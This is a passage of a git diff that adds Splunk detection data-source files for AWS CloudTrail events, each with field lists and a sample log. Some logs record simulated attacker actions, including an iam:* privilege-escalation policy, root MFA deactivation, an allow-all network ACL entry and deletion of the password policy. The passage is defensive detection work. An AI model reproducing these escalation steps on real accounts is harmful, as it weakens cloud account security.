+  "creationDate": "Jan 11, 2021, 9:56:30 AM", "enabled": true, "description": "",
+  "keyUsage": "ENCRYPT_DECRYPT", "keyState": "Enabled", "origin": "AWS_KMS", "keyManager":
+  "CUSTOMER", "customerMasterKeySpec": "SYMMETRIC_DEFAULT", "encryptionAlgorithms":
+  ["SYMMETRIC_DEFAULT"]}}, "requestID": "3356af25-a237-471f-ba5e-abb37d4a256f", "eventID":
+  "f09518ac-5ae5-4214-80ee-4f23ccdedd4c", "readOnly": false, "resources": [{"accountId":
+  "111111111111", "type": "AWS::KMS::Key", "ARN": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}],
+  "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management",
+  "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_createloginprofile.yml b/data_sources/aws_cloudtrail_createloginprofile.yml
new file mode 100644
index 0000000000..639885e9fd
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createloginprofile.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail CreateLoginProfile
+id: 0024fdb1-0d62-4449-970a-746952cf80b6
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateLoginProfile
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.passwordResetRequired
+- requestParameters.userName
+- responseElements.loginProfile.createDate
+- responseElements.loginProfile.passwordResetRequired
+- responseElements.loginProfile.userName
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+  "111111111111", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+  "eventTime": "2021-03-05T01:02:38Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "CreateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101",
+  "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.create-login-profile",
+  "requestParameters": {"userName": "AtomicRedTeam", "passwordResetRequired": false},
+  "responseElements": {"loginProfile": {"userName": "AtomicRedTeam", "createDate":
+  "Mar 5, 2021 1:02:38 AM", "passwordResetRequired": false}}, "requestID": "f1b90364-8aed-4559-96cf-f5f2009bb7cb",
+  "eventID": "ffb76906-6dd1-4219-adfe-e26b92036a1e", "readOnly": false, "eventType":
+  "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId":
+  "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_createnetworkaclentry.yml b/data_sources/aws_cloudtrail_createnetworkaclentry.yml
new file mode 100644
index 0000000000..dc1fe88ad0
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createnetworkaclentry.yml
@@ -0,0 +1,121 @@
+name: AWS CloudTrail CreateNetworkAclEntry
+id: 45934028-10ec-4ab5-a7b1-a6349b833e67
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateNetworkAclEntry
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- direction
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- protocol
+- protocol_code
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.aclProtocol
+- requestParameters.cidrBlock
+- requestParameters.egress
+- requestParameters.networkAclId
+- requestParameters.ruleAction
+- requestParameters.ruleNumber
+- responseElements._return
+- responseElements.requestId
+- rule_action
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- src_ip_range
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+  "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+  "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+  "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T08:38:39Z",
+  "eventSource": "ec2.amazonaws.com", "eventName": "CreateNetworkAclEntry", "awsRegion":
+  "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com",
+  "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 10,
+  "egress": false, "ruleAction": "allow", "icmpTypeCode": {}, "portRange": {}, "aclProtocol":
+  "-1", "cidrBlock": "0.0.0.0/0"}, "responseElements": {"requestId": "d29c9c32-3a72-48d3-b612-6ba795e9ec64",
+  "_return": true}, "requestID": "d29c9c32-3a72-48d3-b612-6ba795e9ec64", "eventID":
+  "6d1ce00e-4099-463c-8a4d-2af2fb2178ba", "readOnly": false, "eventType": "AwsApiCall",
+  "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_createpolicyversion.yml b/data_sources/aws_cloudtrail_createpolicyversion.yml
new file mode 100644
index 0000000000..1f73639beb
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createpolicyversion.yml
@@ -0,0 +1,106 @@
+name: AWS CloudTrail CreatePolicyVersion
+id: f9f0f3da-37ec-4164-9ea0-0ae46645a86b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreatePolicyVersion
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.policyArn
+- requestParameters.policyDocument
+- requestParameters.setAsDefault
+- responseElements.policyVersion.createDate
+- responseElements.policyVersion.isDefaultVersion
+- responseElements.policyVersion.versionId
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLNMCDVJZAY", "arn": "arn:aws:iam::111111111111:user/rhino_escalate",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLHSQZPZFZ", "userName":
+  "rhino_escalate"}, "eventTime": "2021-02-23T00:02:30Z", "eventSource": "iam.amazonaws.com",
+  "eventName": "CreatePolicyVersion", "awsRegion": "us-east-1", "sourceIPAddress":
+  "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64
+  command/iam.create-policy-version", "requestParameters": {"policyArn": "arn:aws:iam::111111111111:policy/rhino_escalate",
+  "policyDocument": "{\n   \"Version\": \"2012-10-17\",\n   \"Statement\": [\n       {\n           \"Sid\":
+  \"AllowEverything\",\n           \"Effect\": \"Allow\",\n           \"Action\":
+  \"iam:*\",\n           \"Resource\": \"*\"\n       }\n    ]\n }", "setAsDefault":
+  true}, "responseElements": {"policyVersion": {"versionId": "v2", "isDefaultVersion":
+  true, "createDate": "Feb 23, 2021 12:02:30 AM"}}, "requestID": "fa42b4b2-f34a-4673-8f9f-b25cf1f5005a",
+  "eventID": "33149175-90fd-4cff-a43b-408e4f848c1c", "readOnly": false, "eventType":
+  "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId":
+  "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_createsnapshot.yml b/data_sources/aws_cloudtrail_createsnapshot.yml
new file mode 100644
index 0000000000..72c39f0b7b
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createsnapshot.yml
@@ -0,0 +1,118 @@
+name: AWS CloudTrail CreateSnapshot
+id: 514135a2-f4b2-4d32-8f31-d87824887f9f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateSnapshot
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.tagSpecificationSet.items{}.resourceType
+- requestParameters.tagSpecificationSet.items{}.tags{}.key
+- requestParameters.tagSpecificationSet.items{}.tags{}.value
+- requestParameters.volumeId
+- responseElements.encrypted
+- responseElements.ownerId
+- responseElements.requestId
+- responseElements.snapshotId
+- responseElements.startTime
+- responseElements.status
+- responseElements.tagSet.items{}.key
+- responseElements.tagSet.items{}.value
+- responseElements.volumeId
+- responseElements.volumeSize
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/bhavin_console",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName":
+  "bhavin_console"}, "eventTime": "2023-03-20T22:31:18Z", "eventSource": "ec2.amazonaws.com",
+  "eventName": "CreateSnapshot", "awsRegion": "us-west-2", "sourceIPAddress": "72.135.1.1",
+  "userAgent": "APN/1.0 HashiCorp/1.0 Terraform/1.1.2 (+https://www.terraform.io)
+  terraform-provider-aws/3.76.1 (+https://registry.terraform.io/providers/hashicorp/aws)
+  aws-sdk-go/1.44.157 (go1.19.3; darwin; amd64) stratus-red-team_46665bb8-dc15-4aba-a5ad-a362772b3f0d
+  HashiCorp-terraform-exec/0.17.3", "requestParameters": {"volumeId": "vol-0363e53e12f67c9b7",
+  "tagSpecificationSet": {"items": [{"resourceType": "snapshot", "tags": [{"key":
+  "StratusRedTeam", "value": "true"}]}]}}, "responseElements": {"requestId": "fefed928-d461-45f0-802f-a99d94c833a8",
+  "snapshotId": "snap-02effb3bb62786b18", "volumeId": "vol-0363e53e12f67c9b7", "status":
+  "pending", "startTime": 1679351478226, "ownerId": "111111111111", "volumeSize":
+  "1", "encrypted": false, "tagSet": {"items": [{"key": "StratusRedTeam", "value":
+  "true"}]}}, "requestID": "fefed928-d461-45f0-802f-a99d94c833a8", "eventID": "2d52d141-d1e6-4d1f-a380-1461c1bf9f83",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+  "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_createtask.yml b/data_sources/aws_cloudtrail_createtask.yml
new file mode 100644
index 0000000000..a1f33c5b39
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createtask.yml
@@ -0,0 +1,121 @@
+name: AWS CloudTrail CreateTask
+id: 6501e4fe-05b2-45f1-bd51-9e06a94fa7d9
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateTask
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.cloudWatchLogGroupArn
+- requestParameters.destinationLocationArn
+- requestParameters.options.logLevel
+- requestParameters.options.verifyMode
+- requestParameters.schedule.scheduleExpression
+- requestParameters.sourceLocationArn
+- responseElements.taskArn
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAYTOGP2RLDF6WQQQQQ:abc@acme.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/abc@acme.com",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLOB2GM111", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WQQQQQ", "arn":
+  "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+  "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+  "webIdFederationData": {}, "attributes": {"creationDate": "2023-03-14T21:53:15Z",
+  "mfaAuthenticated": "false"}}}, "eventTime": "2023-03-14T22:05:36Z", "eventSource":
+  "datasync.amazonaws.com", "eventName": "CreateTask", "awsRegion": "us-west-2", "sourceIPAddress":
+  "1.1.1.1", "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
+  (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", "requestParameters": {"sourceLocationArn":
+  "arn:aws:datasync:us-west-2:111111111111:location/loc-0921d426f7955d416", "destinationLocationArn":
+  "arn:aws:datasync:us-west-1:111111111111:location/loc-0b94cf657c358ef06", "cloudWatchLogGroupArn":
+  "arn:aws:logs:us-west-2:111111111111:log-group:/aws/datasync", "options": {"verifyMode":
+  "ONLY_FILES_TRANSFERRED", "logLevel": "BASIC"}, "excludes": [], "schedule": {"scheduleExpression":
+  "cron(6 * * * ? *)"}, "tags": [], "includes": []}, "responseElements": {"taskArn":
+  "arn:aws:datasync:us-west-2:111111111111:task/task-0c77dc0d4b0792ce6"}, "requestID":
+  "de5f4282-aa2b-49b8-8d1b-c3bdb11e2fba", "eventID": "def4cd05-f845-4aec-bc96-07d6ce420d16",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+  "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "datasync.us-west-2.amazonaws.com"},
+  "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_createvirtualmfadevice.yml b/data_sources/aws_cloudtrail_createvirtualmfadevice.yml
new file mode 100644
index 0000000000..7820bed6ed
--- /dev/null
+++ b/data_sources/aws_cloudtrail_createvirtualmfadevice.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail CreateVirtualMFADevice
+id: 13e6e952-0dad-4190-865c-fb5911725f7a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail CreateVirtualMFADevice
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.path
+- requestParameters.virtualMFADeviceName
+- responseElements.virtualMFADevice.serialNumber
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+  "140429656527", "arn": "arn:aws:iam::140429656527:root", "accountId": "140429656527",
+  "accessKeyId": "ASIASBMSCQHH2YXNXJBU", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+  {}, "attributes": {"creationDate": "2023-01-30T22:59:36Z", "mfaAuthenticated": "false"}}},
+  "eventTime": "2023-01-30T23:02:23Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "CreateVirtualMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.6",
+  "userAgent": "AWS Internal", "requestParameters": {"path": "/", "virtualMFADeviceName":
+  "strt_mfa_2"}, "responseElements": {"virtualMFADevice": {"serialNumber": "arn:aws:iam::140429656527:mfa/strt_mfa_2"}},
+  "requestID": "2fbe2074-55f8-4ec6-ad32-0b250803cf46", "eventID": "7e1c493d-c3c3-4f4a-ae4f-8cdd38970027",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "140429656527", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_deactivatemfadevice.yml b/data_sources/aws_cloudtrail_deactivatemfadevice.yml
new file mode 100644
index 0000000000..21dcced0f2
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deactivatemfadevice.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail DeactivateMFADevice
+id: 7397a10b-1150-4de9-8062-a96454ae53b2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeactivateMFADevice
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.serialNumber
+- requestParameters.userName
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+  "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111",
+  "accessKeyId": "ASIASBMSCQHHWAIHMHUX", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+  {}, "attributes": {"creationDate": "2022-10-04T16:13:23Z", "mfaAuthenticated": "true"}}},
+  "eventTime": "2022-10-04T16:13:45Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "DeactivateMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "142.254.89.27",
+  "userAgent": "Coral/Netty4", "requestParameters": {"userName": "AWS ROOT USER",
+  "serialNumber": "arn:aws:iam::111111111111:mfa/root-account-mfa-device"}, "responseElements":
+  null, "requestID": "d27cfb15-34b4-4c16-82bc-a55d15b4e47d", "eventID": "bfe9fd91-0b4d-470a-9c03-77839151806d",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_deleteaccountpasswordpolicy.yml b/data_sources/aws_cloudtrail_deleteaccountpasswordpolicy.yml
new file mode 100644
index 0000000000..e27f2b78ca
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deleteaccountpasswordpolicy.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail DeleteAccountPasswordPolicy
+id: b0730ac8-0992-4de8-b000-2c7d0fc7a67f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteAccountPasswordPolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- desc
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters
+- responseElements
+- sessionCredentialFromConsole
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+  "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111",
+  "accessKeyId": "ASIASBMSCQHHWMDJXSE6", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+  {}, "attributes": {"creationDate": "2023-01-26T18:44:21Z", "mfaAuthenticated": "false"}}},
+  "eventTime": "2023-01-26T21:23:22Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "DeleteAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7",
+  "userAgent": "AWS Internal", "requestParameters": null, "responseElements": null,
+  "requestID": "e3616938-1aac-4abd-9ea3-3b0367b85082", "eventID": "bbd8cb02-22ba-4d1b-b23d-b82975463376",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_deletedetector.yml b/data_sources/aws_cloudtrail_deletedetector.yml
new file mode 100644
index 0000000000..3c62564018
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletedetector.yml
@@ -0,0 +1,98 @@
+name: AWS CloudTrail DeleteDetector
+id: 5d8bd475-c8bc-4447-b27f-efa508728b90
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteDetector
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.detectorId
+- responseElements.__type
+- responseElements.message
+- result_id
+- signature
+- source
+- sourceIPAddress
